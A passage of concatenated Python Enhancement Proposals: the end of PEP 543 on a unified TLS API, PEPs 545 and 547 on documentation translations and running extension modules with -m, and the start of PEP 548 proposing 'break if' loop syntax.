be a convenience method that wraps ``open`` and ``from_buffer``,
but some TLS implementations may be able to provide more-secure or
faster methods of loading certificates that do not involve Python
code.
"""
Private Keys
This module would define an abstract private key class. Much like the
Certificate class, this class has almost no behaviour in order to give as much
freedom as possible to the concrete implementations to treat keys carefully.
This class has all the caveats of the Certificate class.
class PrivateKey(metaclass=ABCMeta):
@abstractclassmethod
def from_buffer(cls,
buffer: bytes,
password: Optional[Union[Callable[[], Union[bytes, bytearray]], bytes, bytearray]] = None):
"""
Creates a PrivateKey object from a byte buffer. This byte buffer
may be either PEM-encoded or DER-encoded. If the buffer is PEM
encoded it *must* begin with the standard PEM preamble (a series of
dashes followed by the ASCII bytes "BEGIN", the key type, and
another series of dashes). In the absence of that preamble, the
implementation may assume that the certificate is DER-encoded
instead.
The key may additionally be encrypted. If it is, the ``password``
argument can be used to decrypt the key. The ``password`` argument
may be a function to call to get the password for decrypting the
private key. It will only be called if the private key is encrypted
and a password is necessary. It will be called with no arguments,
and it should return either bytes or bytearray containing the
password. Alternatively a bytes, or bytearray value may be supplied
directly as the password argument. It will be ignored if the
private key is not encrypted and no password is needed.
"""
@abstractclassmethod
def from_file(cls,
path: Union[pathlib.Path, bytes, str],
password: Optional[Union[Callable[[], Union[bytes, bytearray]], bytes, bytearray]] = None):
"""
Creates a PrivateKey object from a file on disk. This method may
be a convenience method that wraps ``open`` and ``from_buffer``,
but some TLS implementations may be able to provide more-secure or
faster methods of loading certificates that do not involve Python
code.
The ``password`` parameter behaves exactly as the equivalent
parameter on ``from_buffer``.
"""
Trust Store
As discussed above, loading a trust store represents an issue because different
TLS implementations vary wildly in how they allow users to select trust stores.
For this reason, we need to provide a model that assumes very little about the
form that trust stores take.
This problem is the same as the one that the Certificate and PrivateKey types
need to solve. For this reason, we use the exact same model, by creating an
opaque type that can encapsulate the various means that TLS backends may open
a trust store.
A given TLS implementation is not required to implement all of the
constructors. However, it is strongly recommended that a given TLS
implementation provide the system constructor if at all possible, as this
is the most common validation trust store that is used. Concrete
implementations may also add their own constructors.
Concrete implementations should aim to have TrustStore objects be hashable if
at all possible. This will help ensure that TLSConfiguration objects used with
an individual concrete implementation are also hashable.
class TrustStore(metaclass=ABCMeta):
@abstractclassmethod
def system(cls) -> TrustStore:
"""
Returns a TrustStore object that represents the system trust
database.
"""
@abstractclassmethod
def from_pem_file(cls, path: Union[pathlib.Path, bytes, str]) -> TrustStore:
"""
Initializes a trust store from a single file full of PEMs.
"""
Runtime Access
A not-uncommon use case for library users is to want to allow the library to
control the TLS configuration, but to want to select what backend is in use.
For example, users of Requests may want to be able to select between OpenSSL or
a platform-native solution on Windows and macOS, or between OpenSSL and NSS on
some Linux platforms. These users, however, may not care about exactly how
their TLS configuration is done.
This poses a problem: given an arbitrary concrete implementation, how can a
library work out how to load certificates into the trust store? There are two
options: either all concrete implementations can be required to fit into a
specific naming scheme, or we can provide an API that makes it possible to grab
these objects.
This PEP proposes that we use the second approach. This grants the greatest
freedom to concrete implementations to structure their code as they see fit,
requiring only that they provide a single object that has the appropriate
properties in place. Users can then pass this “backend” object to libraries
that support it, and those libraries can take care of configuring and using the
concrete implementation.
All concrete implementations must provide a method of obtaining a Backend
object. The Backend object can be a global singleton or can be created by a
callable if there is an advantage in doing that.
The Backend object has the following definition:
Backend = namedtuple(
'Backend',
['client_context', 'server_context',
'certificate', 'private_key', 'trust_store']
)
Each of the properties must provide the concrete implementation of the relevant
ABC. This ensures that code like this will work for any backend:
trust_store = backend.trust_store.system()
Changes to the Standard Library
The portions of the standard library that interact with TLS should be revised
to use these ABCs. This will allow them to function with other TLS backends.
This includes the following modules:
asyncio
ftplib
http
imaplib
nntplib
poplib
smtplib
urllib
Migration of the ssl module
Naturally, we will need to extend the ssl module itself to conform to these
ABCs. This extension will take the form of new classes, potentially in an
entirely new module. This will allow applications that take advantage of the
current ssl module to continue to do so, while enabling the new APIs for
applications and libraries that want to use them.
In general, migrating from the ssl module to the new ABCs is not expected
to be one-to-one. This is normally acceptable: most tools that use the ssl
module hide it from the user, and so refactoring to use the new module should
be invisible.
However, a specific problem comes from libraries or applications that leak
exceptions from the ssl module, either as part of their defined API or by
accident (which is easily done). Users of those tools may have written code
that tolerates and handles exceptions from the ssl module being raised:
migrating to the ABCs presented here would potentially cause the exceptions
defined above to be thrown instead, and existing except blocks will not
catch them.
For this reason, part of the migration of the ssl module would require that
the exceptions in the ssl module alias those defined above. That is, they
would require the following statements to all succeed:
assert ssl.SSLError is tls.TLSError
assert ssl.SSLWantReadError is tls.WantReadError
assert ssl.SSLWantWriteError is tls.WantWriteError
The exact mechanics of how this will be done are beyond the scope of this PEP,
as they are made more complex due to the fact that the current ssl
exceptions are defined in C code, but more details can be found in
an email sent to the Security-SIG by Christian Heimes.
Future
Major future TLS features may require revisions of these ABCs. These revisions
should be made cautiously: many backends may not be able to move forward
swiftly, and will be invalidated by changes in these ABCs. This is acceptable,
but wherever possible features that are specific to individual implementations
should not be added to the ABCs. The ABCs should restrict themselves to
high-level descriptions of IETF-specified features.
However, well-justified extensions to this API absolutely should be made. The
focus of this API is to provide a unifying lowest-common-denominator
configuration option for the Python community. TLS is not a static target, and
as TLS evolves so must this API.
Credits
This document has received extensive review from a number of individuals in the
community who have substantially helped shape it. Detailed review was provided
by:
Alex Chan
Alex Gaynor
Antoine Pitrou
Ashwini Oruganti
Donald Stufft
Ethan Furman
Glyph
Hynek Schlawack
Jim J Jewett
Nathaniel J. Smith
Alyssa Coghlan
Paul Kehrer
Steve Dower
Steven Fackler
Wes Turner
Will Bond
Further review was provided by the Security-SIG and python-ideas mailing lists.
Copyright
This document has been placed in the public domain.
| Withdrawn | PEP 543 – A Unified TLS API for Python | Standards Track | This PEP would define a standard TLS interface in the form of a collection of
abstract base classes. This interface would allow Python implementations and
third-party libraries to provide bindings to TLS libraries other than OpenSSL
that can be used by tools that expect the interface provided by the Python
standard library, with the goal of reducing the dependence of the Python
ecosystem on OpenSSL. |
PEP 545 – Python Documentation Translations
Author:
Julien Palard <julien at palard.fr>,
Inada Naoki <songofacandy at gmail.com>,
Victor Stinner <vstinner at python.org>
Status:
Final
Type:
Process
Created:
04-Mar-2017
Resolution:
Python-Dev message
Table of Contents
Abstract
Motivation
Rationale
Translation
Issue tracker
Branches
Hosting
Domain Name, Content negotiation and URL
Language Tag
Fetching And Building Translations
Community
Mailing List
Chat
Repository for PO Files
Translation tools
Documentation Contribution Agreement
Language Team
Alternatives
Simplified English
Changes
Get a Documentation Contribution Agreement
Migrate GitHub Repositories
Setup a GitHub bot for Documentation Contribution Agreement
Patch docsbuild-scripts to Compile Translations
List coordinators in the devguide
Create sphinx-doc Language Switcher
Update sphinx-doc Version Switcher
Enhance Rendering of Untranslated and Fuzzy Translations
New Translation Procedure
Designate a Coordinator
Create GitHub Repository
Setup the Documentation Contribution Agreement
Add support for translations in docsbuild-scripts
Add Translation to the Language Switcher
Previous Discussions
References
Copyright
Abstract
The intent of this PEP is to make existing translations of the Python
Documentation more accessible and discoverable. By doing so, we hope
to attract and motivate new translators and new translations.
Translated documentation will be hosted on python.org. Examples of
two active translation teams:
http://docs.python.org/fr/: French
http://docs.python.org/ja/: Japanese
http://docs.python.org/en/ will redirect to http://docs.python.org/.
Sources of translated documentation will be hosted in the Python
organization on GitHub: https://github.com/python/. Contributors will
have to accept a Documentation Contribution Agreement.
Motivation
On the French #python-fr IRC channel on freenode, it’s not rare to
meet people who don’t speak English and so are unable to read the
Python official documentation. Python wants to be widely available
to all users in any language: this is also why Python 3 supports
any non-ASCII identifiers:
PEP 3131
There are at least 4 groups of people who are translating the Python
documentation to their native language (French [16] [17] [18],
Japanese [19] [20], Spanish [21], Hungarian [26] [27]) even
though their translations are not visible on d.p.o. Other, less
visible and less organized groups, are also translating the
documentation, we’ve heard of Russian [25], Chinese and
Korean. Others we haven’t found yet might also exist. This PEP
defines rules describing how to move translations on docs.python.org
so they can easily be found by developers, newcomers and potential
translators.
The Japanese team has (as of March 2017) translated ~80% of the
documentation, the French team ~20%. French translation went from 6%
to 23% in 2016 [13] with 7 contributors [14], proving a translation
team can be faster than the rate the documentation mutates.
Quoting Xiang Zhang about Chinese translations:
I have seen several groups trying to translate part of our official
doc. But their efforts are disperse and quickly become lost because
they are not organized to work towards a single common result and
their results are hold anywhere on the Web and hard to find. An
official one could help ease the pain.
Rationale
Translation
Issue tracker
Considering that issues opened about translations may be written in
the translation language, which can be considered noise but at least
is inconsistent, issues should be placed outside bugs.python.org (b.p.o).
As all translation must have their own GitHub project (see Repository
for Po Files), they must use the associated GitHub issue tracker.
Considering the noise induced by translation issues redacted in any
languages which may beyond every warnings land in b.p.o, triage will
have to be done. Considering that translations already exist and are
not actually a source of noise in b.p.o, an unmanageable amount of
work is not to be expected. Considering that Xiang Zhang and Victor
Stinner are already triaging, and Julien Palard is willing to help on
this task, noise on b.p.o is not to be expected.
Also, language team coordinators (see Language Team) should help
with triaging b.p.o by properly indicating, in the language of the
issue author if required, the right issue tracker.
Branches
Translation teams should focus on last stable versions, and use tools
(scripts, translation memory, …) to automatically translate what is
done in one branch to other branches.
Note
Translation memories are a kind of database of previously translated
paragraphs, even removed ones. See also Sphinx Internationalization.
The three currently stable branches that will be translated are [12]:
2.7, 3.5, and 3.6. The scripts to build the documentation of older
branches needs to be modified to support translation [12], whereas
these branches now only accept security-only fixes.
The development branch (main) should have a lower translation priority
than stable branches. But docsbuild-scripts should build it anyway so
it is possible for a team to work on it to be ready for the next
release.
Hosting
Domain Name, Content negotiation and URL
Different translations can be identified by changing one of the
following: Country Code Top Level Domain (CCTLD),
path segment, subdomain or content negotiation.
Buying a CCTLD for each translations is expensive, time-consuming, and
sometimes almost impossible when already registered, this solution
should be avoided.
Using subdomains like “es.docs.python.org” or “docs.es.python.org” is
possible but confusing (“is it es.docs.python.org or
docs.es.python.org?”). Hyphens in subdomains like
pt-br.doc.python.org is uncommon and SEOMoz [23] correlated the
presence of hyphens as a negative factor. Usage of underscores in
subdomain is prohibited by the RFC 1123, section 2.1. Finally,
using subdomains means creating TLS certificates for each
language. This not only requires more maintenance but will also cause
issues in language switcher if, as for version switcher, we want a
preflight to check if the translation exists in the given version:
preflight will probably be blocked by same-origin-policy. Wildcard
TLS certificates are very expensive.
Using content negotiation (HTTP headers Accept-Language in the
request and Vary: Accept-Language) leads to a bad user experience
where they can’t easily change the language. According to Mozilla:
“This header is a hint to be used when the server has no way of
determining the language via another way, like a specific URL, that is
controlled by an explicit user decision.” [24]. As we want to be
able to easily change the language, we should not use the content
negotiation as a main language determination, so we need something
else.
Last solution is to use the URL path, which looks readable, allows
for an easy switch from a language to another, and nicely accepts
hyphens. Typically something like: “docs.python.org/de/” or, by
using a hyphen: “docs.python.org/pt-BR/”.
As for the version, sphinx-doc does not support compiling for multiple
languages, so we’ll have full builds rooted under a path, exactly like
we’re already doing with versions.
So we can have “docs.python.org/de/3.6/” or
“docs.python.org/3.6/de/”. A question that arises is:
“Does the language contain multiple versions or does the version contain
multiple languages?”. As versions exist in any case and translations
for a given version may or may not exist, we may prefer
“docs.python.org/3.6/de/”, but doing so scatters languages everywhere.
Having “/de/3.6/” is clearer, meaning: “everything under /de/ is written
in German”. Having the version at the end is also a habit taken by
readers of the documentation: they like to easily change the version
by changing the end of the path.
So we should use the following pattern:
“docs.python.org/LANGUAGE_TAG/VERSION/”.
The current documentation is not moved to “/en/”, instead
“docs.python.org/en/” will redirect to “docs.python.org”.
Language Tag
A common notation for language tags is the IETF Language Tag
[4] based on ISO 639, although gettext uses ISO 639 tags with
underscores (ex: pt_BR) instead of dashes to join tags [5]
(ex: pt-BR). Examples of IETF Language Tags: fr (French),
ja (Japanese), pt-BR (Orthographic formulation of 1943 -
Official in Brazil).
It is more common to see dashes instead of underscores in URLs [6],
so we should use IETF language tags, even if sphinx uses gettext
internally: URLs are not meant to leak the underlying implementation.
It’s uncommon to see capitalized letters in URLs, and docs.python.org
doesn’t use any, so it may hurt readability by attracting the eye on it,
like in: “https://docs.python.org/pt-BR/3.6/library/stdtypes.html”.
RFC 5646#section-2.1.1
(Tags for Identifying Languages (IETF)) section-2.1
states that tags are not case sensitive. As the RFC allows lower case,
and it enhances readability, we should use lowercased tags like
pt-br.
We may drop the region subtag when it does not add distinguishing
information, for example: “de-DE” or “fr-FR”. (Although it might
make sense, respectively meaning “German as spoken in Germany”
and “French as spoken in France”). But when the region subtag
actually adds information, for example “pt-BR” or “Portuguese as
spoken in Brazil”, it should be kept.
So we should use IETF language tags, lowercased, like /fr/,
/pt-br/, /de/ and so on.
Fetching And Building Translations
Currently docsbuild-scripts are building the documentation [8].
These scripts should be modified to fetch and build translations.
Building new translations is like building new versions so, while we’re
adding complexity it is not that much.
Two steps should be configurable distinctively: Building a new language,
and adding it to the language switcher. This allows a transition step
between “we accepted the language” and “it is translated enough to be
made public”. During this step, translators can review their
modifications on d.p.o without having to build the documentation
locally.
From the translation repositories, only the .po files should be
opened by the docsbuild-script to keep the attack surface and probable
bug sources at a minimum. This means no translation can patch sphinx
to advertise their translation tool. (This specific feature should be
handled by sphinx anyway [9]).
Community
Mailing List
The doc-sig mailing list will be used to discuss cross-language
changes on translated documentation.
There is also the i18n-sig list but it’s more oriented towards i18n APIs
[1] than translating the Python documentation.
Chat
Due to the Python community being highly active on IRC, we should
create a new IRC channel on freenode, typically #python-doc for
consistency with the mailing list name.
Each language coordinator can organize their own team, even by choosing
another chat system if the local usage asks for it. As local teams
will write in their native languages, we don’t want each team in a
single channel. It’s also natural for the local teams to reuse
their local channels like “#python-fr” for French translators.
Repository for PO Files
Considering that each translation team may want to use different
translation tools, and that those tools should easily be synchronized
with git, all translations should expose their .po files via a git
repository.
Considering that each translation will be exposed via git
repositories, and that Python has migrated to GitHub, translations
will be hosted on GitHub.
For consistency and discoverability, all translations should be in the
same GitHub organization and named according to a common pattern.
Given that we want translations to be official, and that Python
already has a GitHub organization, translations should be hosted as
projects of the Python GitHub organization.
For consistency, translation repositories should be called
python-docs-LANGUAGE_TAG [22], using the language tag used in
paths: without region subtag if redundant, and lowercased.
The docsbuild-scripts may enforce this rule by refusing to fetch
outside of the Python organization or a wrongly named repository.
The CLA bot may be used on the translation repositories, but with a
limited effect as local coordinators may synchronize themselves with
translations from an external tool, like transifex, and lose track
of who translated what in the process.
Versions can be hosted on different repositories, different directories
or different branches. Storing them on different repositories will
probably pollute the Python GitHub organization. As it
is typical and natural to use branches to separate versions, branches
should be used to do so.
Translation tools
Most of the translation work is actually done on Transifex [15].
Other tools may be used later like https://pontoon.mozilla.org/
and http://zanata.org/.
Documentation Contribution Agreement
Documentation does require a license from the translator, as it
involves creativity in the expression of the ideas.
There’s multiple solutions, quoting Van Lindberg from the PSF asked
about the subject:
Docs should either have the copyright assigned or be under CCO. A
permissive software license (like Apache or MIT) would also get the
job done, although it is not quite fit for task.
The translators should either sign an agreement or submit a
declaration of the license with the translation.
We should have in the project page an invitation for people to
contribute under a defined license, with acceptance defined by their
act of contribution. Such as:
“By posting this project on Transifex and inviting you to
participate, we are proposing an agreement that you will provide
your translation for the PSF’s use under the CC0 license. In return,
you may noted that you were the translator for the portion you
translate. You signify acceptance of this agreement by submitting
your work to the PSF for inclusion in the documentation.”
It looks like having a “Documentation Contribution Agreement”
is the most simple thing we can do as we can use multiple ways (GitHub
bots, invitation page, …) in different context to ensure contributors
are agreeing with it.
Language Team
Each language team should have one coordinator responsible for:
Managing the team.
Choosing and managing the tools the team will use (chat, mailing list, …).
Ensure contributors understand and agree with the documentation
contribution agreement.
Ensure quality (grammar, vocabulary, consistency, filtering spam, ads, …).
Redirect issues posted on b.p.o to the correct GitHub issue tracker
for the language.
Alternatives
Simplified English
It would be possible to introduce a “simplified English” version like
Wikipedia did [10], as discussed on python-dev [11], targeting
English learners and children.
Pros: It yields a single translation, theoretically readable by
everyone and reviewable by current maintainers.
Cons: Subtle details may be lost, and translators from English to English
may be hard to find as stated by Wikipedia:
> The main English Wikipedia has 5 million articles, written by nearly
140K active users; the Swedish Wikipedia is almost as big, 3M articles
from only 3K active users; but the Simple English Wikipedia has just
123K articles and 871 active users. That’s fewer articles than
Esperanto!
Changes
Get a Documentation Contribution Agreement
The Documentation Contribution Agreement have to be written by the
PSF, then listed at https://www.python.org/psf/contrib/ and have its
own page like https://www.python.org/psf/contrib/doc-contrib-form/.
Migrate GitHub Repositories
We (authors of this PEP) already own French and Japanese Git repositories,
so moving them to the Python documentation organization will not be a
problem. We’ll however be following the New Translation Procedure.
Setup a GitHub bot for Documentation Contribution Agreement
To help ensuring contributors from GitHub have signed the
Documentation Contribution Agreement, We can setup the “The Knights
Who Say Ni” GitHub bot customized for this agreement on the migrated
repositories [28].
Patch docsbuild-scripts to Compile Translations
Docsbuild-script must be patched to:
List the language tags to build along with the branches to build.
List the language tags to display in the language switcher.
Find translation repositories by formatting
github.com:python/python-docs-{language_tag}.git (See
Repository for Po Files)
Build translations for each branch and each language.
Patched docsbuild-scripts must only open .po files from
translation repositories.
List coordinators in the devguide
Add a page or a section with an empty list of coordinators to the
devguide, each new coordinator will be added to this list.
Create sphinx-doc Language Switcher
Highly similar to the version switcher, a language switcher must be
implemented. This language switcher must be configurable to hide or
show a given language.
The language switcher will only have to update or add the language
segment to the path like the current version switcher does. Unlike
the version switcher, no preflight are required as destination page
always exists (translations does not add or remove pages).
Untranslated (but existing) pages still exists, they should however be
rendered as so, see Enhance Rendering of Untranslated and Fuzzy
Translations.
Update sphinx-doc Version Switcher
The patch_url function of the version switcher in
version_switch.js have to be updated to understand and allow the
presence of the language segment in the path.
Enhance Rendering of Untranslated and Fuzzy Translations
It’s an opened sphinx issue [9], but we’ll need it so we’ll have to
work on it. Translated, fuzzy, and untranslated paragraphs should be
differentiated. (Fuzzy paragraphs have to warn the reader what he’s
reading may be out of date.)
New Translation Procedure
Designate a Coordinator
The first step is to designate a coordinator, see Language Team,
The coordinator must sign the CLA.
The coordinator should be added to the list of translation coordinators
on the devguide.
Create GitHub Repository
Create a repository named “python-docs-{LANGUAGE_TAG}” (IETF language
tag, without redundant region subtag, with a dash, and lowercased.) on
the Python GitHub organization (See Repository For Po Files.), and
grant the language coordinator push rights to this repository.
Setup the Documentation Contribution Agreement
The README file should clearly show the following Documentation
Contribution Agreement:
NOTE REGARDING THE LICENSE FOR TRANSLATIONS: Python's documentation is
maintained using a global network of volunteers. By posting this
project on Transifex, GitHub, and other public places, and inviting
you to participate, we are proposing an agreement that you will
provide your improvements to Python's documentation or the translation
of Python's documentation for the PSF's use under the CC0 license
(available at
`https://creativecommons.org/publicdomain/zero/1.0/legalcode`_). In
return, you may publicly claim credit for the portion of the
translation you contributed and if your translation is accepted by the
PSF, you may (but are not required to) submit a patch including an
appropriate annotation in the Misc/ACKS or TRANSLATORS file. Although
nothing in this Documentation Contribution Agreement obligates the PSF
to incorporate your textual contribution, your participation in the
Python community is welcomed and appreciated.
You signify acceptance of this agreement by submitting your work to
the PSF for inclusion in the documentation.
Add support for translations in docsbuild-scripts
As soon as the translation hits its first commits, update the
docsbuild-scripts configuration to build the translation (but not
displaying it in the language switcher).
Add Translation to the Language Switcher
As soon as the translation hits:
100% of bugs.html with proper links to the language repository
issue tracker.
100% of tutorial.
100% of library/functions (builtins).
the translation can be added to the language switcher.
Previous Discussions
[Python-ideas] Cross link documentation translations (January, 2016)
[Python-Dev] Translated Python documentation (February 2016)
[Python-ideas] https://docs.python.org/fr/ ? (March 2016)
References
[1]
[I18n-sig] Hello Python members, Do you have any idea about
Python documents?
(https://mail.python.org/pipermail/i18n-sig/2013-September/002130.html)
[2] [Doc-SIG] Localization of Python docs
(https://mail.python.org/pipermail/doc-sig/2013-September/003948.html)
[4]
IETF language tag
(https://en.wikipedia.org/wiki/IETF_language_tag)
[5]
GNU Gettext manual, section 2.3.1: Locale Names
(https://www.gnu.org/software/gettext/manual/html_node/Locale-Names.html)
[6]
Semantic URL: Slug
(https://en.wikipedia.org/wiki/Clean_URL#Slug)
[8]
Docsbuild-scripts GitHub repository
(https://github.com/python/docsbuild-scripts/)
[9] (1, 2)
i18n: Highlight untranslated paragraphs
(https://github.com/sphinx-doc/sphinx/issues/1246)
[10]
Wikipedia: Simple English
(https://simple.wikipedia.org/wiki/Main_Page)
[11]
Python-dev discussion about simplified English
(https://mail.python.org/pipermail/python-dev/2017-February/147446.html)
[12] (1, 2)
Passing options to sphinx from Doc/Makefile
(https://github.com/python/cpython/commit/57acb82d275ace9d9d854b156611e641f68e9e7c)
[13]
French translation progression
(https://mdk.fr/pycon2016/#/11)
[14]
French translation contributors
(https://github.com/AFPy/python_doc_fr/graphs/contributors?from=2016-01-01&to=2016-12-31&type=c)
[15]
Python-doc on Transifex
(https://www.transifex.com/python-doc/public/)
[16]
French translation
(https://www.afpy.org/doc/python/)
[17]
French translation on Gitea
(https://git.afpy.org/AFPy/python-docs-fr)
[18]
French mailing list
(http://lists.afpy.org/mailman/listinfo/traductions)
[19]
Japanese translation
(http://docs.python.jp/3/)
[20]
Japanese translation on GitHub
(https://github.com/python-doc-ja/python-doc-ja)
[21]
Spanish translation
(https://docs.python.org/es/3/tutorial/index.html)
[22]
[Python-Dev] Translated Python documentation: doc vs docs
(https://mail.python.org/pipermail/python-dev/2017-February/147472.html)
[23]
Domains - SEO Best Practices | Moz
(https://moz.com/learn/seo/domain)
[24]
Accept-Language
(https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Accept-Language)
[25]
Документация Python 2.7!
(http://python-lab.ru/documentation/index.html)
[26]
Python-oktató
(http://web.archive.org/web/20170526080729/http://harp.pythonanywhere.com/python_doc/tutorial/index.html)
[27]
The Python-hu Archives
(https://mail.python.org/pipermail/python-hu/)
[28]
[Python-Dev] PEP 545: Python Documentation Translations
(https://mail.python.org/pipermail/python-dev/2017-April/147752.html)
Copyright
This document has been placed in the public domain.
| Final | PEP 545 – Python Documentation Translations | Process | The intent of this PEP is to make existing translations of the Python
Documentation more accessible and discoverable. By doing so, we hope
to attract and motivate new translators and new translations. |
PEP 547 – Running extension modules using the -m option
Author:
Marcel Plch <gmarcel.plch at gmail.com>,
Petr Viktorin <encukou at gmail.com>
Status:
Deferred
Type:
Standards Track
Created:
25-May-2017
Python-Version:
3.7
Post-History:
Table of Contents
Deferral Notice
Abstract
Motivation
Rationale
Background
Proposal
Specification
ExtensionFileLoader Changes
Backwards Compatibility
Reference Implementation
Copyright
Deferral Notice
Cython – the most important use case for this PEP and the only explicit
one – is not ready for multi-phase initialization yet.
It keeps global state in C-level static variables.
See discussion at Cython issue 1923.
The PEP is deferred until the situation changes.
Abstract
This PEP proposes implementation that allows built-in and extension
modules to be executed in the __main__ namespace using
the PEP 489 multi-phase initialization.
With this, a multi-phase initialization enabled module can be run
using following command:
$ python3 -m _testmultiphase
This is a test module named __main__.
Motivation
Currently, extension modules do not support all functionality of
Python source modules.
Specifically, it is not possible to run extension modules as scripts using
Python’s -m option.
The technical groundwork to make this possible has been done for PEP 489,
and enabling the -m option is listed in that PEP’s
“Possible Future Extensions” section.
Technically, the additional changes proposed here are relatively small.
Rationale
Extension modules’ lack of support for the -m option has traditionally
been worked around by providing a Python wrapper.
For example, the _pickle module’s command line interface is in the
pure-Python pickle module (along with a pure-Python reimplementation).
This works well for standard library modules, as building command line
interfaces using the C API is cumbersome.
However, other users may want to create executable extension modules directly.
An important use case is Cython, a Python-like language that compiles to
C extension modules.
Cython is a (near) superset of Python, meaning that compiling a Python module
with Cython will typically not change the module’s functionality, allowing
Cython-specific features to be added gradually.
This PEP will allow Cython extension modules to behave the same as their Python
counterparts when run using the -m option.
Cython developers consider the feature worth implementing (see
Cython issue 1715).
Background
Python’s -m option is handled by the function
runpy._run_module_as_main.
The module specified by -m is not imported normally.
Instead, it is executed in the namespace of the __main__ module,
which is created quite early in interpreter initialization.
For Python source modules, running in another module’s namespace is not
a problem: the code is executed with locals and globals set to the
existing module’s __dict__.
This is not the case for extension modules, whose PyInit_* entry point
traditionally both created a new module object (using PyModule_Create),
and initialized it.
Since Python 3.5, extension modules can use PEP 489 multi-phase initialization.
In this scenario, the PyInit_* entry point returns a PyModuleDef
structure: a description of how the module should be created and initialized.
The extension can choose to customize creation of the module object using
the Py_mod_create callback, or opt to use a normal module object by not
specifying Py_mod_create.
Another callback, Py_mod_exec, is then called to initialize the module
object, e.g. by populating it with methods and classes.
Proposal
Multi-phase initialization makes it possible to execute an extension module in
another module’s namespace: if a Py_mod_create callback is not specified,
the __main__ module can be passed to the Py_mod_exec callback to be
initialized, as if __main__ was a freshly constructed module object.
One complication in this scheme is C-level module state.
Each module has a md_state pointer that points to a region of memory
allocated when an extension module is created.
The PyModuleDef specifies how much memory is to be allocated.
The implementation must take care that md_state memory is allocated at most
once.
Also, the Py_mod_exec callback should only be called once per module.
The implications of multiply-initialized modules are too subtle to require
expecting extension authors to reason about them.
The md_state pointer itself will serve as a guard: allocating the memory
and calling Py_mod_exec will always be done together, and initializing an
extension module will fail if md_state is already non-NULL.
Since the __main__ module is not created as an extension module,
its md_state is normally NULL.
Before initializing an extension module in __main__’s context, its module
state will be allocated according to the PyModuleDef of that module.
While PEP 489 was designed to make these changes generally possible,
it’s necessary to decouple module discovery, creation, and initialization
steps for extension modules, so that another module can be used instead of
a newly initialized one, and the functionality needs to be added to
runpy and importlib.
Specification
A new optional method for importlib loaders will be added.
This method will be called exec_in_module and will take two
positional arguments: module spec and an already existing module.
Any import-related attributes, such as __spec__ or __name__,
already set on the module will be ignored.
The runpy._run_module_as_main function will look for this new
loader method.
If it is present, runpy will execute it instead of trying to load and
run the module’s Python code.
Otherwise, runpy will act as before.
ExtensionFileLoader Changes
importlib’s ExtensionFileLoader will get an implementation of
exec_in_module that will call a new function, _imp.exec_in_module.
_imp.exec_in_module will use existing machinery to find and call an
extension module’s PyInit_* function.
The PyInit_* function can return either a fully initialized module
(single-phase initialization) or a PyModuleDef (for PEP 489 multi-phase
initialization).
In the single-phase initialization case, _imp.exec_in_module will raise
ImportError.
In the multi-phase initialization case, the PyModuleDef and the module to
be initialized will be passed to a new function, PyModule_ExecInModule.
This function raises ImportError if the PyModuleDef specifies
a Py_mod_create slot, or if the module has already been initialized
(i.e. its md_state pointer is not NULL).
Otherwise, the function will initialize the module according to the
PyModuleDef.
Backwards Compatibility
This PEP maintains backwards compatibility.
It only adds new functions, and a new loader method that is added for
a loader that previously did not support running modules as __main__.
Reference Implementation
The reference implementation of this PEP is available at GitHub.
Copyright
This document has been placed in the public domain.
| Deferred | PEP 547 – Running extension modules using the -m option | Standards Track | This PEP proposes implementation that allows built-in and extension
modules to be executed in the __main__ namespace using
the PEP 489 multi-phase initialization. |
PEP 548 – More Flexible Loop Control
Author:
R David Murray
Status:
Rejected
Type:
Standards Track
Created:
05-Sep-2017
Python-Version:
3.7
Post-History:
05-Aug-2017
Table of Contents
Rejection Note
Abstract
Motivation
Syntax
Semantics
Justification and Examples
Copyright
Rejection Note
Rejection by Guido:
https://mail.python.org/pipermail/python-dev/2017-September/149232.html
Abstract
This PEP proposes enhancing the break and continue statements
with an optional boolean expression that controls whether or not
they execute. This allows the flow of control in loops to be
expressed more clearly and compactly.
Motivation
Quoting from the rejected PEP 315:
It is often necessary for some code to be executed before each
evaluation of the while loop condition. This code is often
duplicated outside the loop, as setup code that executes once
before entering the loop:<setup code>
while <condition>:
<loop body>
<setup code>
That PEP was rejected because no syntax was found that was superior
to the following form:
while True:
<setup code>
if not <condition>:
break
<loop body>
This PEP proposes a superior form, one that also has application to
for loops. It is superior because it makes the flow of control in
loops more explicit, while preserving Python’s indentation aesthetic.
Syntax
The syntax of the break and continue statements are extended
as follows:
break_stmt : "break" ["if" expression]
continue_stmt : "continue" ["if" expression]
In addition, the syntax of the while statement is modified as follows:
while_stmt : while1_stmt|while2_stmt
while1_stmt : "while" expression ":" suite
["else" ":" suite]
while2_stmt : "while" ":" suite
Semantics
A break if or continue if is executed if and only if
expression evaluates to true.
A while statement with no expression loops until a break or return
is executed (or an error is raised), as if it were a while True
statement. Given that the loop can never terminate except in a
way that would not cause an else suite to execute, no else
suite is allowed in the expressionless form. If practical, it
should also be an error if the body of an expressionless while
does not contain at least one break or return statement.
Justification and Examples
The previous “best possible” form:
while True:
<setup code>
if not <condition>:
break
<loop body>
could be formatted as:
while True:
<setup code>
if not <condition>: break
<loop body>
This is superficially almost identical to the form proposed by this
PEP:
while:
<setup code>
break if not <condition>
<loop body>
The significant difference here is that the loop flow control
keyword appears first in the line of code. This makes it easier
to comprehend the flow of control in the loop at a glance, especially
when reading colorized code.
For example, this is a common code pattern, taken in this case
from the tarfile module:
while True:
buf = self._read(self.bufsize)
if not buf:
break
t.append(buf)
Reading this, we either see the break and possibly need to think about
where the while is that it applies to, since the break is indented
under the if, and then track backward to read the condition that
triggers it; or, we read the condition and only afterward discover
that this condition changes the flow of the loop.
With the new syntax this becomes:
while:
buf = self._read(self.bufsize)
break if not buf
t.append(buf)
Reading this we first see the break, which obviously applies to
the while since it is at the same level of indentation as the loop
body, and then we read the condition that causes the flow of control
to change.
Further, consider a more complex example from sre_parse:
while True:
c = self.next
self.__next()
if c is None:
if not result:
raise self.error("missing group name")
raise self.error("missing %s, unterminated name" % terminator,
len(result))
if c == terminator:
if not result:
raise self.error("missing group name", 1)
break
result += c
return result
This is the natural way to write this code given current Python
loop control syntax. However, given break if, it would be more
natural to write this as follows:
while:
c = self.next
self.__next()
break if c is None or c == terminator
result += c
if not result:
raise self.error("missing group name")
elif c is None:
raise self.error("missing %s, unterminated name" % terminator,
len(result))
return result
This form moves the error handling out of the loop body, leaving the
loop logic much more understandable. While it would certainly be
possible to write the code this way using the current syntax, the
proposed syntax makes it more natural to write it in the clearer form.
